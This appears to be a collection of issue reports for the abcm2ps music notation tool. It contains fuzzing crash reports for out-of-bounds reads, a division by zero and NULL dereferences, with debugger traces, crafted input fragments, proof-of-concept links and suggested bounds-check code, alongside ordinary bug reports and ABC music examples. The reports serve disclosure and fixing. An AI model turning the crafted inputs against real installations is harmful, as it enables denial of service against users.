==17297==    by 0x4030E7: main (abcm2ps.c:1040)
==17297==  Address 0x400447dbc is not stack'd, malloc'd or (recently) free'd
==17297== 
==17297== 
==17297== Process terminating with default action of signal 11 (SIGSEGV)
==17297==  Access not within mapped region at address 0x400447DBC
==17297==    at 0x4123B0: calculate_beam (draw.c:352)
==17297==    by 0x418F3C: draw_sym_near (draw.c:4097)
==17297==    by 0x4295CB: delayed_output (music.c:5085)
==17297==    by 0x4295CB: output_music (music.c:5140)
==17297==    by 0x42E1F0: generate (parse.c:1039)
==17297==    by 0x42E877: gen_ly (parse.c:1060)
==17297==    by 0x43433F: do_tune (parse.c:3621)
==17297==    by 0x405488: abc_eof (abcparse.c:200)
==17297==    by 0x41FA44: frontend (front.c:905)
==17297==    by 0x403FAC: treat_file (abcm2ps.c:239)
==17297==    by 0x4030E7: main (abcm2ps.c:1040)
==17297==  If you believe this happened as a result of a stack
==17297==  overflow in your program's main thread (unlikely but
==17297==  possible), you can try to increase the size of the
==17297==  main thread stack using the --main-stacksize= flag.
==17297==  The main thread stack size used in this run was 8388608.
==17297== 
==17297== HEAP SUMMARY:
==17297==     in use at exit: 957,953 bytes in 120 blocks
==17297==   total heap usage: 153 allocs, 33 frees, 2,220,269 bytes allocated
==17297== 
==17297== LEAK SUMMARY:
==17297==    definitely lost: 0 bytes in 0 blocks
==17297==    indirectly lost: 0 bytes in 0 blocks
==17297==      possibly lost: 0 bytes in 0 blocks
==17297==    still reachable: 957,953 bytes in 120 blocks
==17297==         suppressed: 0 bytes in 0 blocks
==17297== Rerun with --leak-check=full to see details of leaked memory
==17297== 
==17297== For counts of detected and suppressed errors, rerun with: -v
==17297== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)

It is a read access violation (calculate_beam (draw.c:352))
report2.zip

stem_err = min_tb[0][(unsigned) s->nflags];

gef➤  p s->nflags
$1 = 0xff

gef➤  p min_tb[0][(unsigned) s->nflags]

Cannot access memory at address 0x400447dbc

The value of s->nflags could be controlled by an attacker but I did not do a thorough analysis.
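Both this report and the draw_acc global-buffer-overflow report earlier on the page are the same defect class: a small per-symbol count is used as a table index without a range check. As an added example (not abcm2ps code), the C below shows what index the quoted expression produces when nflags holds -1 or 255, and a lookup that rejects any value outside the table instead of reading past it. The table dimensions, the values in it and the names min_tb, index_from_nflags and stem_err_lookup are assumptions; the real table size is not on the page.

```c
#include <stdio.h>

#define MAX_FLAGS 8   /* hypothetical column count */

/* Constructed stem-error table: one row per stem direction, one column per
 * flag count. The values are arbitrary. */
static const float min_tb[2][MAX_FLAGS] = {
    { 1.0f, 2.0f, 3.0f, 4.0f, 5.0f, 6.0f, 7.0f, 8.0f },
    { 1.5f, 2.5f, 3.5f, 4.5f, 5.5f, 6.5f, 7.5f, 8.5f },
};

/* The index the reported expression builds from nflags: a negative count
 * wraps to a huge unsigned value, and 255 is still far past the table. */
static unsigned long index_from_nflags(int nflags)
{
    return (unsigned) nflags;
}

/* Checked lookup: returns 0 with the value in *out, or -1 when the row or the
 * flag count lies outside the table. The caller decides how to report it. */
static int stem_err_lookup(int row, int nflags, float *out)
{
    if (row < 0 || row >= 2)
        return -1;
    if (nflags < 0 || nflags >= MAX_FLAGS)
        return -1;
    *out = min_tb[row][(unsigned) nflags];
    return 0;
}

int main(void)
{
    float v;

    printf("index for nflags=-1:  %lu\n", index_from_nflags(-1));
    printf("index for nflags=255: %lu\n", index_from_nflags(255));
    if (stem_err_lookup(0, 2, &v) == 0)
        printf("nflags=2   -> %.1f\n", v);
    if (stem_err_lookup(0, 255, &v) != 0)
        printf("nflags=255 -> rejected\n");
    if (stem_err_lookup(0, -1, &v) != 0)
        printf("nflags=-1  -> rejected\n");
    return 0;
}
```

The cast to unsigned in the original expression silences a negative index rather than catching it; checking the signed value against the table bounds before the cast is what turns the out-of-bounds read into an ordinary parse error.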

Division-by-zero vulnerability in parse.c:6056

Hi,

I'm hitting this bug in the latest version of abcm2ps (abcm2ps-8.13.21 (2018-05-05))

valgrind ./abcm2ps report4.abc 
==17600== Memcheck, a memory error detector
==17600== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==17600== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
==17600== Command: ./abcm2ps report4.abc
==17600== 
abcm2ps-8.13.21 (2018-05-05)
File report4.abc
report4.abc:92:0: error: Bad voice ID in %%staves
report4.abc:92:0: error: Voice '144' of %%staves has no symbol
report4.abc:98:34: error: Decoration !-300349! not defined
report4.abc:107:63: error: Bad character
 107 (3CDE(3FGA B/c/d/e/d/c/B/A/ (18506zDE(256FGz z/c/d/e/d/c/B/z/|(0CDz(3zGA ...
                                                                    ^
==17600== 
==17600== Process terminating with default action of signal 8 (SIGFPE)
==17600==  Integer divide by zero at address 0x803061278
==17600==    at 0x434924: set_tuplet (parse.c:6056)
==17600==    by 0x434924: do_tune (parse.c:3608)
==17600==    by 0x4088A1: abc_parse (abcparse.c:177)
==17600==    by 0x41F686: txt_add_eos (front.c:379)
==17600==    by 0x4200E7: frontend (front.c:891)
==17600==    by 0x403FAC: treat_file (abcm2ps.c:239)
==17600==    by 0x4030E7: main (abcm2ps.c:1040)
==17600== 
==17600== HEAP SUMMARY:
==17600==     in use at exit: 636,821 bytes in 115 blocks
==17600==   total heap usage: 146 allocs, 31 frees, 1,768,065 bytes allocated
==17600== 
==17600== LEAK SUMMARY:
==17600==    definitely lost: 30 bytes in 3 blocks
==17600==    indirectly lost: 0 bytes in 0 blocks
==17600==      possibly lost: 0 bytes in 0 blocks
==17600==    still reachable: 636,791 bytes in 112 blocks
==17600==         suppressed: 0 bytes in 0 blocks
==17600== Rerun with --leak-check=full to see details of leaked memory
==17600== 
==17600== For counts of detected and suppressed errors, rerun with: -v
==17600== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)

It is a division-by-zero vulnerability

<do_tune+2256>   idiv   r11d
$r11   : 0x0000000000000000

report4.zip
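The quoted line 107 contains tuplet prefixes such as "(0CDz" and "(18506zDE", and the SIGFPE lands in set_tuplet, so a zero tuplet field reaching a division is the likely shape of the fault. As an added example (not abcm2ps code), the C below parses the ABC tuplet prefix "(p:q:r" and refuses any field given as zero before the scaled duration is ever computed. The default-q table follows the ABC 2.1 standard; the struct and function names are assumptions, and the inputs in main are constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>

struct tuplet { int p, q, r; };   /* p notes in the time of q, for the next r notes */

/* Default q when omitted, per the ABC 2.1 tuplet table; 'compound' marks
 * 6/8-style meters where (5, (7 and (9 span three units instead of two. */
static int default_q(int p, int compound)
{
    switch (p) {
    case 2: case 4: case 8: return 3;
    case 3: case 6:         return 2;
    default:                return compound ? 3 : 2;
    }
}

/* Parse "(p", "(p:q", "(p:q:r" or "(p::r" at s. Returns the number of
 * characters consumed, or -1 when the prefix is malformed or any field that
 * is present is zero, so no caller can divide by a p or q of 0. */
static int parse_tuplet(const char *s, int compound, struct tuplet *t)
{
    const char *start = s;
    long v[3] = {0, 0, 0};
    int given[3] = {0, 0, 0};

    if (s[0] != '(' || !isdigit((unsigned char) s[1]))
        return -1;
    s++;
    for (int i = 0; i < 3; i++) {
        if (isdigit((unsigned char) *s)) {
            char *end;
            v[i] = strtol(s, &end, 10);
            given[i] = 1;
            s = end;
        }
        if (i < 2 && *s == ':')
            s++;
        else
            break;
    }
    for (int i = 0; i < 3; i++)
        if (given[i] && v[i] <= 0)
            return -1;             /* "(0..." and "(3:0" are rejected here */
    t->p = (int) v[0];
    t->q = given[1] ? (int) v[1] : default_q(t->p, compound);
    t->r = given[2] ? (int) v[2] : t->p;
    return (int) (s - start);
}

/* Scaled length of one note inside the tuplet; only valid after a
 * successful parse, which guarantees p > 0. */
static int tuplet_note_len(const struct tuplet *t, int base_len)
{
    return base_len * t->q / t->p;
}

int main(void)
{
    struct tuplet t;
    const char *good = "(3:2:3CDE";   /* constructed input */
    const char *bad  = "(0CDz";       /* the shape seen in the reported line */
    int n = parse_tuplet(good, 0, &t);

    printf("%.*s -> p=%d q=%d r=%d, note length 12 becomes %d\n",
           n, good, t.p, t.q, t.r, tuplet_note_len(&t, 12));
    printf("%s -> %s\n", bad, parse_tuplet(bad, 0, &t) < 0 ? "rejected" : "accepted");
    return 0;
}
```

Tracking whether each field was actually present matters: treating an explicit "0" as "omitted" would silently substitute a default and hide malformed input, whereas rejecting it gives the parser a line and column to report, in the same style as the "Bad character" errors above.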

access violation music.c:862 in gchord_width(struct SYMBOL *s, float wlnote, float wlw)

https://drive.google.com/open?id=1LBcdyedXMoub4bhGGHFMxYqU7NeoAuwf

Version: 8.13.20 after commit fd956e1

(gdb) set args POC6
(gdb) r

abcm2ps-8.13.20 (2018-02-21)
File POC6
POC6:3:2: error: Bad character
3 |2ÿÿdÿ&e,d_d&ddªB-ÿ2ÿ
^
POC6:3:3: error: Bad character
3 |2ÿÿdÿ&e,d_d&ddªB-ÿ2ÿ
^
.
.
.
POC6:27:14: error: !slide! must be on a note or a rest
POC6:27:38: error: Bad character 't'
POC6:27:38: error: Bad character 'N'
POC6:27:38: error: Bad character 'N'
POC6:31:0: error: tune info ':' not treated
POC6:26:25: warning: Line underfull (561pt of 682pt)
POC6:4:0: error: Note too much dotted
POC6:3:20: error: Bad tie
POC6:22:0: error: Bad tie

Program received signal SIGSEGV, Segmentation fault.
gchord_width (s=s@entry=0x845f88, wlnote=wlnote@entry=8, wlw=wlw@entry=8) at music.c:862
862 if (s2->sflags & S_SEQST)

(gdb) bt
#0 0x00000000004f4fb0 in gchord_width (s=s@entry=0x845f88, wlnote=wlnote@entry=8, wlw=wlw@entry=8)
at music.c:862
#1 0x000000000050eedb in set_allsymwidth (s=0x845f88) at music.c:1194
#2 0x000000000050eedb in set_allsymwidth (last_s=last_s@entry=0x830db0) at music.c:1436
#3 0x000000000052defa in output_music () at music.c:3371
#4 0x000000000052defa in output_music () at music.c:4766
#5 0x000000000052defa in output_music () at music.c:5134
#6 0x000000000054d511 in generate () at parse.c:1039
#7 0x00000000005709cd in do_tune (eob=0) at parse.c:1060
#8 0x00000000005709cd in do_tune () at parse.c:3620
#9 0x0000000000414731 in abc_eof () at abcparse.c:200
#10 0x00000000004e45e9 in frontend (s=,
s@entry=0x827a40 "X:^2\rK:\r|2\377\377d\377&e,d_d&dd\252B-\377\062\377\n[e,c>|2\377\377&e9k>|2\377\n[\020'eD[\377\205\377fe-d6e{@)\177\377\r:\001&d\353\377\177ddzd{\370\062Kdd\231d2\rtdd&E,\351\177"&ed\252d-\r\177&KL\031K:\352\325J:Ӫd-\r\177&K_\031K:\352\325J:\323\323\375L\213-c>|2!\v[\377[\020'eD[\377\205\377fe-d6e{@)\177\377\r:\001&d\353\377\177ddzd{UUUUUt&K:1J:\323\326\360L\203-", <incomplete sequence \375>..., ftype=ftype@entry=0, fname=fname@entry=0x825ea0 "POC6", linenum=31, linenum@entry=0) at front.c:901
#11 0x000000000040b98d in treat_file (fn=, ext=) at abcm2ps.c:239
#12 0x00000000004084f9 in main (argc=0, argv=) at abcm2ps.c:1040

(gdb) list
857 for (s2 = s->ts_prev; ; s2 = s2->ts_prev) {
858 if (s2 == s->prev) {
859 AT_LEAST(wlw, lspc);
860 break;
861 }
862 if (s2->sflags & S_SEQST)
863 lspc -= s2->shrink;
864 }
865 }
866 if (alspc != 0)

Option parsing misses '-p'

The command line argument processing doesn't detect the -p switch. For example:

[sbeitzel@PirateBook ~/src/github/abcm2ps]$ ./abcm2ps -p sample.abc
abcm2ps-8.13.16 (2017-10-24)
error: Unknown flag: -p ignored
File sample.abc

I'm attaching a patch which fixes this:
pipeformat_patch.txt

Error with redefinable symbol

The ABC standard suggests that one ought to be able to redefine a symbol to include an annotation. However, abcm2ps seems to treat any such definition as needing to be a decoration string. For example, the following ABC file:

%abc-2.1
%%straightflags false
%%flatbeams true
%%graceslurs false
%%titleformat T0, R-1 C1
X: 1
T: Moonstar (SNARE)
C: arr. by Gloria Pellegrin
M: 4/4
L: 1/8
K: none stafflines=1
V: S stem=down gstem=up dyn=up clef=none snm="S"
U: R = ///
U: r = //
U: v = "^V"
V:S
{A}c>A r(cA) {A}cvrc

produces this error output:
abcm2ps-8.13.17 (2017-11-21)
File moonstar_snare.abc
moonstar_snare.abc:17:19: error: Decoration !"^V"! not defined

Whereas, if the line is changed to:
{A}c>A r(cA) {A}c"^V"rc
then the output looks the way one expects, with a 'V' appearing above the last note.

access violation front.c:117 in txt_add(unsigned char *s, int sz)

https://drive.google.com/open?id=1Y2IbtEr9v4l4Ruie_AY9BFJOHOGiDt7S

(gdb) set args POC4
(gdb) r

abcm2ps-8.13.20 (2018-02-21)
File POC4
Line 14: Empty line in tune header - K:C added

Program received signal SIGSEGV, Segmentation fault.
__memcpy_avx_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S:273
273 ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S: No such file or directory.
(gdb) bt
#0 0x00007ffff69d51e3 in __memcpy_avx_unaligned ()
at ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S:273
#1 0x00000000004e1b5b in txt_add (__len=18446744073709551615, __src=0x827f3e, __dest=)
at /usr/include/x86_64-linux-gnu/bits/string3.h:53
#2 0x00000000004e1b5b in txt_add (s=0x827f3e "", sz=-1) at front.c:117
#3 0x00000000004e558a in frontend (s=,
s@entry=0x827ea0 "X:Eƒ\nB\222\nWV\thf\nf\nI:tOB\222\nW:T@\nW:\nW:9 hf\nf\nI: OB\222\nW:\t@EBhf\nf\nI: OB\222\n\nW OB\222\nW:\\nB\222\nWV\thf\nf\nI:tOB\222\nW:Tt\nW:\nW:9\211hf\nf\nI: OB\222\nW:\tOEBx\nW:TthB\222\035W:x\nW:\nW:9thf\nf\nI: ", ftype=ftype@entry=0, fname=fname@entry=0x827f60 "POC4", linenum=31, linenum@entry=0) at front.c:882
#4 0x000000000040b98d in treat_file (fn=, ext=) at abcm2ps.c:239
#5 0x00000000004084f9 in main (argc=0, argv=) at abcm2ps.c:1040

Grace note value changes with key

If a tune is noted as being in the "key" of bagpipe (K:HP) then grace notes will be drawn as small 32nd notes. However, if the tune is noted as being in the key of D (K:D), which is how bagpipes are tuned, then grace notes are drawn as small 1/8th notes. Some modern composers, notably Fred Morrison and Gordon Duncan, have made wide use of C-natural and so there are many tunes that are written for bagpipes and which are really not in the key of D but in G. It'd be nice to be able to provide a formatting directive at the top of the tune to specify the drawn time value of a grace note, similar to the "L:" field.

%%gracenotelength 1/32 for example, while the default (for tunes not in the key of HP) would be %%gracenotelength 1/8.

I understand that this would represent an extension to the existing ABC music standard and would have to go through discussion and voting, etc. But in the interim, what about an application specific directive? %%abcm2ps:gracenotelength 1/32

Repeat barline problem on multiple voices

There seems to have been a problem for a while now with opening repeat bar lines not going through to multiple voices when at the start of a new line. It only seems to apply to the second one in a file.

Example

X:9
T:Indian Queen, The
Q:1/2=110
S:Playford
%%scale=0.75
M:2/2
L:1/4
K:D
V:1
"^A" |: f/g/ | "D"af df | "A"e2 A2 | "D"FA Af | "A"e2 - ef/g/ |
"D"af df | "A"e2 A2 | "D"FA Af | "D"d3 :|
"^B" |: c/d/ | "A"e/d/c/B/ Ae | "F#m"fc "Bm"dB | "D"f/g/a "E"b^g | "A"a3e/f/ |
"G"g/f/e/d/ "A"ca | "G"Bg "D"Af/g/ | "G"ed "A"ec | "D"d3 :|
V:2
|: f/g/ | aafa- | agec | Adfa | g2 g>a | aafa- | agec | Ad "A"fa/g/ | f3 :|
|: e/f/ | g/f/e/d/ cg | a2 fd | d/e/f ^ge | aceg/a/ | b/a/g/f/ ea | g2 fa | bg- ga/g/ | f3 :|

8va parse abc is error

This ABC parses with an error: the 8va is shown repeating from measure number 17 onward:

X:1
Z:?
%%scale 0.85
%%pagewidth 20.99cm
%%leftmargin 1.90cm
%%rightmargin 1.27cm
%%score { ( 1 2 ) | ( 3 4 ) }
L:1/4
Q:1/2=72
M:4/4
I:linebreak $
K:C
V:1 treble nm="Piano" snm="Pno."
L:1/16
V:2 treble
V:3 bass
L:1/16
V:4 bass
V:1
"_sempre leggiero""^Molto allegro""_9." !1!CDEF GFED CDEF GFED | CDEF GFED CDEF GA!3!B!1!c | %2
!1!DEFG !5!AGFE DE!3!F!1!G ABcd |$ !3!BABc dcBA GA!3!B!1!c defg | %4
[Q:1/4=40]"_cresc." !3!edef gfed cdef gfed | cdef gfed cdef gabc' |$ !1!defg agfe defg abc'd' | %7
babc' d'c'ba gabc' d'e'f'g' |!f! [c'e']2 z2 z4 z8 |$ [!1!!3!c'e']2 z2 z4 z4 [c'e']2 z2 | %10
[c'^f']2 z2 z4 z4 [!2!!3!^fa]2 z2 | [^fd']2 z2 z4 z4 [fc']2 z2 |$ %12
[Q:1/4=40]"_dimin." [gb]2 z2 z4 !3!bgab !1!c'd'e'^f' | %13
!p!!8va(! !1!g'a'b'c'' d''c''b'a' g'!4!^f'e'd' c'!3!bag!8va)! | %14
!2!^f!1!gab !4!c'bag !4!fedc !3!BAG!3!^F |$ %15
[Q:1/4=40]"_cresc." !5!A!1!DE^F !1!GAB!1!c de^f!1!g abc'!5!d' | %16
!3!bgab !1!c'd'e'^f'!8va(! !5!g'!1!d'e'^f' !4!g'd'e'f' | %17
!1!g'a'b'c'' d''c''b'a' g'!4!^f'e'd' c'!3!bag!8va)! |$ !2!^f!1!gab c'bag !4!fedc !3!BAG!3!^F | %19
!f! !5!ADE^F !1!GAB!1!c de^f!1!g abc'!5!d' | !3!b2 z2 z4 z !1!Bc!3!d !1!e^fga |$ %21
!p! b2 z2 z4 !5!bag^f !1!e!3!dcB |!f! !2!c2 z2 z4 z !1!cde !4!^f!1!gab | %23
!4!c'2 z2 z4 !4!c'bag !4!^fedc |$!f! d2 z2 z4 z !1!de!3!^f !1!gabc' | %25
!p![Q:1/4=40]"_cresc." !5!d'2 z2 z4 !5!d'c'ba g!3!^fed | %26
!2!e!3!^f!1!ga!8va(! !3!b!1!c'd'e' !4!^f'e'd'!1!c' !3!bag!2!^f |$ %27
!1!gab!4!c' !1!d'e'^f'!4!g' !5!a'g'f'e' !1!d'!4!c'ba | %28
!1!bb'a'g' ^f'e'!3!d'^c' !1!d'b'a'g' f'e'!3!d'c' | %29
!1!d'b'a'g' ^f'e'!3!d'!2!^c' !5!e'd'=c'b abc'd' |$ %30
!p! !1!bb'a'g' ^f'e'!3!d'!2!^c' !1!d'b'a'g' f'e'd'c' | %31
d'b'a'g' ^f'e'd'!2!^c' !5!e'd'=c'b abc'd'!8va)! | %32
!pp! !2!b!4!d'c'b !1!a!4!c'ba !1!g!4!bag !1!=f!4!agf |$ %33
!1!e!4!gfe !1!d!4!fed !1!c!4!edc !1!B!4!dcB | %34
[Q:1/4=40]"_cresc." !1!A!3!cBA !2!^G!4!BAG !1!A!3!cBA !2!G!4!BAG | %35
!1!AB!3!c!1!d e^f^g!5!a !4!=g!2!efg agfe |$!f! de^f!1!g abc'!5!d' !1!gab!1!c'!8va(! d'e'^f'!5!g' | %37
!1!d'e'^f'!1!g' a'b'c''d''!8va)! z4 [Acd^f]4 | [Bdg]4 z4 z8 |$ %39
[Q:1/4=40]"_dolce" z4 .[!1!!3!GB]4 .[GB]4 .[GB]4 | (!1!!5!d8 !4!c8) | %41
z4 .[!2!!4!c^f]4 .[cf]4 .[cf]4 |$[Q:1/4=40]"_cresc." (g8 d8) | z4 .[!1!!3!gb]4 .[gb]4 .[gb]4 | %44
(d'8 c'8) |$!8va(! z4 .[!2!!4!c'^f']4 .[c'f']4 .[c'f']4 | %46
!f! .[bg']2 z2 z4 !1!d'e'!3!^f'!1!g' a'b'c''d'' | .!3!b'2 z2 .!2!g'2 z2 d'e'^f'g' a'b'c''d'' |$ %48
.!3!b'2 z2.!1!g'2 z2!p! !2!=f'!3!g'!4!a'!1!b' c''d''e''f'' | %49
e''d''c''!1!b' !4!a'g'f'!1!e' !2!d'!3!e'!4!f'!1!g' a'b'c''d'' | %50
c''b'a'g' !4!f'e'd'!1!c' !2!b!3!c'!4!d'!1!e' f'g'a'b' |$ %51
[Q:1/4=40]"_cresc." a'g'f'e' !4!d'c'ba !2!g!3!a!4!b!1!c' d'e'f'g' | %52
f'e'd'c' !4!bagf !2!e!3!f!4!g!1!a bc'd'e' | d'c'ba !4!gfe!1!d !2!c!3!d!4!e!1!f gabc' |$ %54
!ff! !1!b!5!g'f'e' d'c'!3!b!8va)!a g!4!fed c!3!BAG | !4!FEDC !3!B,A,G,A, B,!1!CDE !1!FGAB | %56
c2 z2 z4 z4 [!1!!2!EG]2 z2 |$ [Ec]2 z2 (c8 _B4 | %58
[Q:1/4=40]"_cresc." [FA]2) z2 z4 z4 [!1!!2!Ac]2 z2 | [Af]2 z2 (!4!f8 a4 |$ %60
[!1!!2!G=B]2) z2 z4 z4 [!1!!3!Bd]2 z2 | [Bg]2 z2 (g8 f4 |$ %62
!f! !1!e)fg!1!a bc'd'e' d'e'd'c' ba!3!gf | efg!1!a bc'd'e' d'e'd'c' ba!3!gf |$ %64
e2 z2 [!2!!5!dg]2 z2 !1!c2 z2 [!2!!5!Be]2 z2 | !1!A2 z2 [!2!!5!Gc]2 z2 !1!F2 z2 [!2!!5!EA]2 z2 |$ %66
!3!F!1!DEF !1!GAB!4!^c !1!defg !5!a!2!e!3!f!1!d | %67
!5!g!2!^d!3!e!1!=c gdec !5!f!2!^c!3!=d!1!B fcdB |$ %68
[Q:1/4=40]"_dimin." =c2 z2 z4 z4 [!3!!5!EG]2 z2 | [CE]2 z2 z4 z4 [EG]2 z2 | %70
!p! [CE]2 z2 z4!ff! [cegc']2 z2 z4 |] %71
V:2
x4 | x4 | x4 |$ x4 | x4 | x4 |$ x4 | x4 | x4 |$ x4 | x4 | x4 |$ x4 |!8va(! x4!8va)! | x4 |$ x4 | %16
x2!8va(! x2 | x4!8va)! |$ x4 | x4 | x4 |$ x4 | x4 | x4 |$ x4 | x4 | x!8va(! x3 |$ x4 | x4 | x4 |$ %30
x4 | x4!8va)! | x4 |$ x4 | x4 | x4 |$ x3!8va(! x | x2!8va)! x2 | x4 |$ x4 | ^F4 | x4 |$ B4 | x4 | %44
^f4 |$!8va(! x4 | x4 | x4 |$ x4 | x4 | x4 |$ x4 | x4 | x4 |$ x7/4!8va)! x9/4 | x4 | x4 |$ x E3 | %58
x4 | x A3 |$ x4 | x B3 |$ x4 | x4 |$ x4 | x4 |$ x4 | x4 |$ x4 | x4 | x4 |] %71
V:3
!p! z16 | [!4!E,G,]2 z2 z4 z4 [E,G,]2 z2 | [F,A,]2 z2 z4 z4 [!4!F,A,]2 z2 |$ %3
[G,B,]2 z2 z4 z4 [!4!B,D]2 z2 | [CE]2 z2 z4 z8 |[K:treble] [!4!EG]2 z2 z4 z4 [EG]2 z2 |$ %6
[FA]2 z2 z4 z4 [!4!FA]2 z2 | [GB]2 z2 z4 z4 [GB]2 z2 | !5!CDEF GFED CDEF GFED |$ %9
CDEF GFED CDEF !1!G!3!ABc | !5!DE^FG AGFE DEFG AGFE | DE^FG AGFE DEFG !1!A!3!Bcd |$ %12
!5!GABc dcBA G2 z2 z4 | [B,DG]2 z2 z4 z4 [B,DG]2 z2 | %14
[!4!A,CD^F]2 z2 z4 z4[K:bass] [!4!A,CD]2 z2 |$ [!5!!2!^F,C]2 z2 z4 z4 [F,A,D]2 z2 | %16
[G,B,D]2 z2 z4 z8 | [B,,D,G,]4 z4 z4 [B,,D,G,]4 |$ [A,,C,D,^F,]4 z4 z4 [A,,C,D,F,]4 | %19
[^F,,A,,C,D,]4 z4 z4 [F,,A,,C,D,]4 | !5!G,,A,,B,,C, D,!3!E,^F,G, G,,2 z2 z4 |$ %21
!5!G,A,B,C D!3!E^FG G,2 z2 z4 | !5!A,,B,,C,D, E,!3!^F,G,A, A,,2 z2 z4 | %23
[K:treble]!p! !5!A,B,CD E!3!^FGA A,2 z2 z4 |$[K:bass] !4!B,,C,D,!1!E, !4!^F,G,A,!1!B, B,,2 z2 z4 | %25
[K:treble] !4!B,CD!1!E !4!^FGA!1!B B,2 z2 z4 | [!4!CG]8 [CDA]8 |$ [B,DG]8 [A,CD^F]8 | %28
!f! [G,B,DG]2 z2 z2 (!2!^A2 .[!1!!4!GB]2) z2 z2 (A2 | .[GB]2) z2 z4 [D^Fc]8 |$ %30
[K:bass] !2!G,4 D,4 G,4 D,4 | G,4 D,4 ^F,4 D,4 | %32
[G,B,]2 z2[K:treble] !3!^d2 z2 !2!e2 z2 !3!B2 z2 |$ !2!c2 z2 !3!^G2 z2 !2!A2 z2 [!1!!4!DG]2 z2 | %34
[!5!!3!CE]2 z2 [D=F]2 z2 [CE]2 z2 [DF]2 z2 | [CE]8 [^CE=GA]8 |$ %36
[DGB]2 z2[K:bass] [D,D]2 z2 [B,,B,]2 z2 [G,,G,]2 z2 | [D,,D,]2 z2 z4!ff! [D,^F,A,C]8 | %38
!5!G,,A,,B,,C, D,C,B,,A,, G,,A,,B,,C, D,C,B,,A,, |$ %39
G,,A,,B,,C, D,C,B,,A,, G,,A,,B,,C, D,!3!E,^F,G, | !5!D,E,^F,G, A,G,F,E, D,E,F,G, A,G,F,E, | %41
D,E,^F,G, A,G,F,E, D,E,F,G, A,!3!B,CD |$ G,A,B,C DCB,A, G,A,B,C DCB,A, | %43
G,A,B,C DCB,A, G,A,B,C[K:treble] DE^FG | DE^FG AGFE DEFG AGFE |$ DE^FG AGFE DEFG ABcd | %46
GABc d!3!e^fg .f2 z2 .d2 z2 | GABc de^fg .f2 z2 .d2 z2 |$ GABc d!3!e^fg !3!a4 !1!c'4 | %49
!4!g4 !1!b4 !4!=f4 !1!a4 | !4!e4 !1!g4 !4!d4 !1!f4 |$ c4 e4 B4 d4 | A4 c4 G4 B4 | %53
F4 A4 !3!E4 G4 |$ [G,B,DF]16 | z16!>(!!>)! |[K:bass]!p! C,D,E,F, G,F,E,D, C,D,E,F, G,F,E,D, |$ %57
C,D,E,F, G,F,E,D, C,D,E,F, G,!3!A,_B,C | !5!F,G,A,_B, CB,A,G, F,G,A,B, CB,A,G, | %59
F,G,A,_B, CB,A,G, F,G,A,B, C!3!DEF |$ !5!G,A,=B,C DCB,A, G,A,B,C DCB,A, | %61
G,A,B,C DCB,A, G,A,B,C[K:treble] D!3!EFG |$ !5!CDEF G!3!ABc [!2!!4!GB]2 z2 [!1!!5!B,G]2 z2 | %63
CDEF GABc [GB]2 z2 [B,G]2 z2 |$[K:bass] !4!C!1!EDC !4!B,!1!DCB, !4!A,!1!CB,A, !4!G,!1!B,A,G, | %65
!4!F,!1!A,G,F, !4!E,!1!G,F,E, !4!D,!1!F,E,D, !4!^C,!1!E,!2!D,C, |$ D,2 z2 z4 [F,,A,,D,]2 z2 z4 | %67
[G,,=C,E,]2 z2 z4 [G,,D,F,]2 z2 z4 |$ C,D,E,F, G,F,E,D, C,D,E,F, G,F,E,D, | %69
C,D,E,F, G,F,E,D, C,D,E,F, G,F,E,D, | C,2 z2 z4 [C,,E,,G,,C,]2 z2 z4 |] %71
V:4
x4 | x4 | x4 |$ x4 | x4 |[K:treble] x4 |$ x4 | x4 | x4 |$ x4 | x4 | x4 |$ x4 | x4 | %14
x3[K:bass] x |$ x4 | x4 | x4 |$ x4 | x4 | x4 |$ x4 | x4 |[K:treble] x4 |$[K:bass] x4 | %25
[K:treble] x4 | x4 |$ x4 | x4 | x4 |$[K:bass] [G,B,]2 [G,B,]2 | [G,B,]2 [^F,C]2 | x[K:treble] x3 |$ %33
x4 | x4 | x4 |$ x[K:bass] x3 | x4 | x4 |$ x4 | x4 | x4 |$ x4 | x3[K:treble] x | x4 |$ x4 | x4 | %47
x4 |$ x2 a2 | g2 f2 | e2 d2 |$ c2 B2 | A2 G2 | F2 E2 |$ x4 | x4 |[K:bass] x4 |$ x4 | x4 | x4 |$ %60
x4 | x3[K:treble] x |$ x4 | x4 |$[K:bass] x4 | x4 |$ x4 | x4 |$ x4 | x4 | x4 |] %71

Null pointer dereference vulnerability in the function deco_define()

What is the vulnerability?
A Null Pointer Dereference vulnerability was discovered in abcm2ps (8.14.1-master). It can be triggered by sending a crafted abc file to the abcm2ps binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact when a victim opens a specially crafted file.

Tested environment : 64-bit ubuntu 16.04 LTS

Affected version : 8.14.1-master

Command -
./abcm2ps r -E -g -x -v -O fff -O = -i -k 1 $POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10

Synopsis :
While doing research: when the get_note() function is called, it invokes the decoration-conversion function deco_cnv(), which calls deco_intern() to convert the external deco number to the internal one.
When a crafted .abc file is passed for conversion, while the symbols are being read from the deco table to write into the converted file, deco_define(name=0x0) receives a name argument of 0 taken from the defined symbols; it is passed to strlen(name), which leads to a SIGSEGV in __strlen_avx2().

Vulnerable code :

l = strlen(name);
for (d = user_deco; d; d = d->next) {
    if (strncmp(d->text, name, l) == 0
     && d->text[l] == ' ')
        return deco_build(name, d->text);
}

Debug:

GDB :

In function deco_define()

 989	 	l = strlen(name);
  990	 	for (d = user_deco; d; d = d->next) {
    991	 		if (strncmp(d->text, name, l) == 0
    992	 		 && d->text[l] == ' ')
    993	 			return deco_build(name, d->text);
    994	 	}
────────────────────────────────────────────────────────────────────────────────────────────────────────────────
 Id 1, Name: "abcm2ps", stopped, reason: BREAKPOINT
────────────────────────────────────────────────────────────────────────────────────────────────────────────────
 0x555555566a8b → deco_define(name=0x0)
 0x555555567ed8 → deco_intern(s=0x555555875a00, ideco=<optimized out>)
 0x555555567ed8 → deco_cnv(dc=0x555555875c08, s=0x555555875a00, prev=0x0)
